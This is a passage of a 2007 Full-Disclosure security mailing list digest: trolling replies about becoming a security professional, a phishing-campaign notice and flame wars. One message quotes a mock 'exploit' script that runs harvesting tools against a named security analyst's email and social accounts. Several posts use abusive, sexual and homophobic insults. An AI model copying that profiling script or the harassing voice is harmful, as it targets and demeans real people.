>POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF,
>A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT
>ASSISTANCE OR AFFILIATION."
>It should be pointed out that although RCHRAFE has strong
>ties to the American Republican Party and political
>republican ideology, we do not participate actively
>in government politics of any kind.
>PERTAINING TO the overall goals of RCHRAFE as an organization
>and the pervasive RCHRAFE social movement, we have distinct
>purpose and bearing.
>While RCHRAFE assimilates no political or social goals in
>and of themselves, we reserve the right to voice opinion
>when political or social policies or activities relate
>to these aforementioned goals.
>These goals, stated, comprise COMMUNIQUE POINT NUMBER
>TWO:
>"RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS,
>MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES."
>We may surmise in corollary then, by the combined
>observations of communique points one and two, that RCHRAFE
>is in definition a usurping entity, and will tend to
>remain benign concerning rival computer groups.
>TO CONCLUDE, RCHRAFE will exist as long as the interests
>of the corollaries are subject to external change. We
>reserve the right to maintain the status of RCHRAFE and
>the goals of the corollaries by any means necessary, but
>never by exceeding necessary means.
>We Shall Rise!
>
>
>
>------------------------------
>
>Message: 12
>Date: Tue, 20 Nov 2007 07:33:09 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
>	Professional ?
>To: worried security <worriedsecurity@...glemail.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <47427FA5.2090307@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>worried security wrote:
>> On Nov 17, 2007 1:08 PM, Meef <massa@...-dhaka.edu> wrote:
>>   
>>> What are the steps to follow to become a computer security professional ?,
>>>
>>
>> Sorry, you will never make it to professionalism as you broke the
>> first and most important rule.
>>
>> NEVER POST ON A PUBLIC MAILING LIST!!!!
>>   
>
>And you are here because, you are 'worried security'.
>> The second most important rule of becoming a security professional is,
>> if you do need to post to a public mailing list then never do it under
>> a .edu or .gov or official company e-mail address, we will all just
>> point and laugh and have your account hi-jacked with the next
>> cross-site scripting flaw that gets to the public mailing list.
>>
>>   
>But I thought the first most important rule, which was not to be broken,
>was not to post on a security mailing list, such as this.
>
>Kindly go through your cross-site request forgery techniques with me,
>I'm really in need of a m3nt0r
>> The third most important rule to becoming a security professional is
>> never talk to people on public mailing lists who have broken rule one
>> and rule two or take what's said on public mailing lists seriously. As
>> soon as you take what is said on a public mailing list seriously is
>> the day you should cut your wrists.
>>
>>   
>He's getting so horny right now
>> Always get advice from a credible source after learning of a threat on
>> the public mailing lists.
>>   
>Like worried security?
>
>Please tell me if you think the linux/tcp stack is currently vulnerable.
>
>I have N0 1D34
>> The fourth most important rule to becoming a security professional,
>> always use a throw-away e-mail account so it doesn't matter if script
>> kids hi-jack your e-mail account with the next cross-site scripting
>> vulnerability that gets posted to the public mailing lists.
>>   
>
>HIJACK THIS BITCH
>> The fifth most important rule to becoming a security professional is
>> use an alias on public mailing lists, never use your real name, place
>> of work, place of education, place of living, as backfires cannot be
>> reversed. Once you've posted something it's posted, archived around the
>> world and translated into more languages than you can shake a stick
>> at.
>>
>>   
>Y0u juzt m1ght be shirl0ck h0lm3z
>> The sixth most important rule to becoming a security professional is
>> be paranoid. Yes, don't listen to people who say paranoia is bad for
>> you. In this industry it pays to be paranoid. Forget about your own
>> welfare, you've got millions of users and the economic stability of
>> the world to think about. Trade in your own life to save the life of
>> others. Indeed being a security professional will mean long hours, and
>> sleepless nights. Be prepared to be woken up in the middle of the
>> night and expect to have people shouting for answers down the phone to
>> you or rush you into the security operations center when news of a
>> major data breach reaches the inbox of your security team.
>>   
>"Be prepared to be woken up in the middle of the
>night and expect to have people shouting for answers down the phone to
>you or rush you into the security operations center when news of a
>major data breach reaches the inbox of your security team."
>
>This is what a professional at computer security undergoes?
>
>I thought I could just, be in my bedroom reading about aix 
>security enhancements and win32 buffer overflow prevention methods
>
>> The seventh most important rule to becoming a security professional.
>> Think for yourself don't post ridiculous questions to a public mailing
>> list and expect to get the right answer, most folks will make anything
>> up and people generally cannot be trusted. Use search engines, read
>> books and free your mind from what other security researchers are
>> doing. Don't duplicate, originate your own work.
>>   
>
>He talks a whole lot about mailing lists
>> The eighth most important rule to becoming a good security
>> professional is have balls, if you think something is wrong, don't be
>> afraid to speak up, even if it means losing your job. Remember, the
>> security of other people comes before the security of your job
>> position. So if you think something is wrong, tell people about it,
>> and if they don't listen, then keep repeating it over and over. Never
>> give in and keep on trying to tell people about something you believe
>> in. You are a slave to the security of others, you don't come first
>> "they" do.
>>   
>
>So what's wrong buddy?
>> Ninth most important rule to becoming a good security professional.
>> Don't read public mailing lists, don't read security news sites, and
>> don't read web logs about what other people think about security. They
>> all suck, don't trust anyone in this world and don't believe the hype.
>> 99.9% of anything posted in public is attention grabbing bullshit, you
>> don't need it. Concentrate with what's going on within your own company
>> and screw all the others. Only read these mediums if it's related to
>> what you're doing that day at work to fix a bug or thwart a security
>> incident. Don't read about what could happen, stick to with what's
>> actually happening to you that day. Not what other people say is going
>> to happen next week.
>>
>> Tenth most important rule to becoming a security professional, know
>> your enemy. Yes, get to know them, eavesdrop on them, send them gifts
>> and make them feel special. Your enemy is the single most important
>> person to you and your company's assets. If you don't know what your
>> enemy is doing then you don't have security. Remember though, don't
>> concentrate on other people's enemies, concentrate on enemies for your
>> company. Don't read websites that say they are your enemy, because it's
>> unlikely they really are. Your real enemies don't announce themselves
>> often and are unlikely to make public announcements about it, and the
>> ones that do are usually hoaxes.
>>   
>
>Fuck, I couldn't read it all.. I got exhauzted
>
>rchrafe.wordpress.com
>
>
>
>------------------------------
>
>Message: 13
>Date: Tue, 20 Nov 2007 07:46:58 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
>	Professional ?
>To: Richard Golodner <rgolodner@...ratection.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <474282E2.50009@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> 	Get a good job where you can find best security practices being used
>> and learn from others who have been in the field. You will develop your own
>> set of tools and ideas, but the concepts are almost always the same. Defense
>> in depth is a good idea and it works.
>> 	11th most important rule. Never ever take advice that has ten rules
>> about something they know nothing about. 
>> 	N3TD3V, please go away. Come back under a different alias if you
>> must but please STFU! 
>> 	The guy wanted a serious answer and you broke many of your own
>> rules. Don't get your kilt all bunched up, just be serious for once in your
>> net-sec career.
>> 		Richard Golodner
>> 		Infratection IT Services
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>   
>You're so gay dude
>
>
>
>------------------------------
>
>Message: 14
>Date: Tue, 20 Nov 2007 07:49:20 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] How to become a Computer Security
>	Professional ?
>To: XSS Worm XSS Security Information Portal
>	<cross-site-scripting-security@...worm.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <47428370.6050500@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>XSS Worm XSS Security Information Portal wrote:
>> #!/bin/sh
>>
>> # 0day exploit for Paul Schmehl
>> # based on information provided by Paul Schmehl
>> # pauls@...allas.edu <mailto:pauls@...allas.edu>
>> #
>>
>> echo pauls > /hack/edu/utdallas.edu/known.addresses
>>
>> googledump.pl --email-addresses --context-links 
>>  --referers --extended-links -keywords 
>"Paul","Schmehl","utdallas.edu 
>> <http://utdallas.edu>", "pauls@", "pauls@...allas 
>> ","paul.schmehl@" --verbose 
>>
>> socialgrab.pl --known-address "pauls@...allas.edu 
>> <mailto:pauls@...allas.edu>" --real-name "Paul Schmehl" 
>> --tags=security,hacking,utdallas,vulnerability 
>> --
>search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,dig

>g,bebo,ebay,blogger,wordpress 
>> --verbose --dump-links
>>
>> infopull.pl --pgp-search --whois --domaintools --usenet --
>trackers 
>> --irclog --mirrors --listserv --known-
>addresses="pauls@...allas.edu 
>> <mailto:pauls@...allas.edu>"
>>
>> echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu
>>
>> # http://xssworm.com
>HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAH

>AHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHA

>HAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA 
>
>>
>>
>>
>>
>>
>> On 11/19/07, *Paul Schmehl* <pauls@...allas.edu 
>> <mailto:pauls@...allas.edu>> wrote:
>>
>>     --On November 19, 2007 3:34:23 AM +0000 worried security
>>     <worriedsecurity@...glemail.com
>>     <mailto:worriedsecurity@...glemail.com>> wrote:
>>     >
>>     > The fourth most important rule to becoming a security professional,
>>     > always use a throw-away e-mail account so it doesn't matter if script
>>     > kids hi-jack your e-mail account with the next cross-site scripting
>>     > vulnerability that gets posted to the public mailing lists.
>>     >
>>     You forgot the most important rule of all.  Pay no heed to bozos who post
>>     anonymously and don't even have a job in security.  Their advice is
>>     usually worth just as much as their reputation.
>>
>>     Paul Schmehl ( pauls@...allas.edu <mailto:pauls@...allas.edu>)
>>     Senior Information Security Analyst
>>     The University of Texas at Dallas
>>     http://www.utdallas.edu/ir/security/
>>     <http://www.utdallas.edu/ir/security/>
>>
>>     _______________________________________________
>>     Full-Disclosure - We believe in it.
>>     Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>     <http://lists.grok.org.uk/full-disclosure-charter.html>
>>     Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>>
>> -- 
>> Francesco Vaj [CISSP - GIAC]
>> CSS Security Researcher
>> mailto: vaj@...pam.xssworm.com <mailto:vaj@...pam.xssworm.com>
>> aim: XSS Cross Site
>> ------
>> XSS Cross Site Scripting Attacks
>> Web 2.0 Application Security Information Blog (tm) 2007
>> http://www.XSSworm.com/
>> ------
>> "Vaj, bella vaj.
>
>
>
>------------------------------
>
>Message: 15
>Date: Mon, 19 Nov 2007 20:52:30 -0800
>From: "Dancho Danchev" <dancho.danchev@...il.com>
>Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
>To: full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<b787ce30711192052k34755398t7a9c2c3c1c98418@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>In need of a "creative phishing campaign of the year"? Try this,
>perhaps the largest phishing attack spoofing MySpace and collecting
>all the login details at a central location, that's been active for
>over a month, and continues to be. A Chinese phishing group has come
>up with legitimate looking MySpace profiles (profile.myspace.com) in
>the form of subdomains at their original .cn domains, and by doing so
>achieve its ultimate objective - establish trust through
>typosquatting, remain beneath the security vendors radar by comment
>spamming the URLs inside MySpace, and obtain the login details of
>everyone who got tricked.
>
>Complete assessment in the form of domains and URLs participating, as
>well as the message used per domain for the internal comment spam
>campaign, is available here :
>
>http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-attack.html
>
>Regards,
>Dancho
>
>
>
>------------------------------
>
>Message: 16
>Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
>From: Elazar Broad <elazarb@...thlink.net>
>Subject: Re: [Full-disclosure] Multiple stack-based buffer overflows
>	in	dxmsft.dll
>To: "full-disclosure@...ts.grok.org.uk"
>	<full-disclosure@...ts.grok.org.uk>
>Message-ID:
>	<22163281.1195532704914.JavaMail.root@...amui-rubis.atl.sa.earthlink.net>
>Content-Type: text/plain; charset=UTF-8
>
>I did not see this: http://www.milw0rm.com/exploits/4251, my 
>apologies, please ignore my last post...
>
>
>
>------------------------------
>
>Message: 17
>Date: Tue, 20 Nov 2007 08:34:58 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] so gay huh?
>To: Richard Golodner <rgolodner@...ratection.com>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID: <47428E22.5060807@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> 	Please come and introduce yourself to me at any Info-Sec conference
>> or convention so we can meet face to face. We will see what is up then.
>> 			Richard Golodner
>>   
>
>Mr Golodner,
>           I'm currently unaware as to why you want us to come and meet you at
>an info-sec conference, or convention, things like defcon and HOPE are for the
>utterly pathetic.
>
>We don't know what to say, you're too funny to take seriously.
>
>Never email us again, you piece of garbage.
>
>rcbrafe
>
>
>
>------------------------------
>
>Message: 18
>Date: Tue, 20 Nov 2007 08:57:18 +0100
>From: rchrafe <rchrafe@...il.com>
>Subject: Re: [Full-disclosure] so gay huh?
>To: Richard Golodner <rgolodner@...ratection.com>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID: <4742935E.4060008@...il.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Richard Golodner wrote:
>> 	You think those are professional conferences? Those are script
>> children parties for retards that can't get laid. 
>LOL -- Like my, RCHRAFE didn't know this.
>> Come to a Homeland
>> Security meeting 
>Our affiliates are members of several.
>> or a National Security briefing.
>What about CTU ?
>>  You can't even hide your
>> own identity properly. 
>>   
>..
>You know who we are?
>
>SHIT
>We're going to die a sudden death!
>> 	I did not say I wanted to meet you.
>That's too bad, I'm horny f0r y0u
>>  What I am saying is that if you
>> are so tough, step and be a man.
>/me stepz up & becomez 4 m4n
>>  At least use your real name or I will begin
>> to publicize it for you if you would like. 
>>   
>Firstly: Richard Golodner i love pissing you off, it gets me off.
>Secondly: Your post previously sometime ago made me cum all over my 
>k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-08/msg00019.html
>
>You probably don't know the difference between IGRP and EIGRP routing 
>protocolz
>
>What a loser, haha.
>
>
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 33, Issue 38
>***********************************************


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
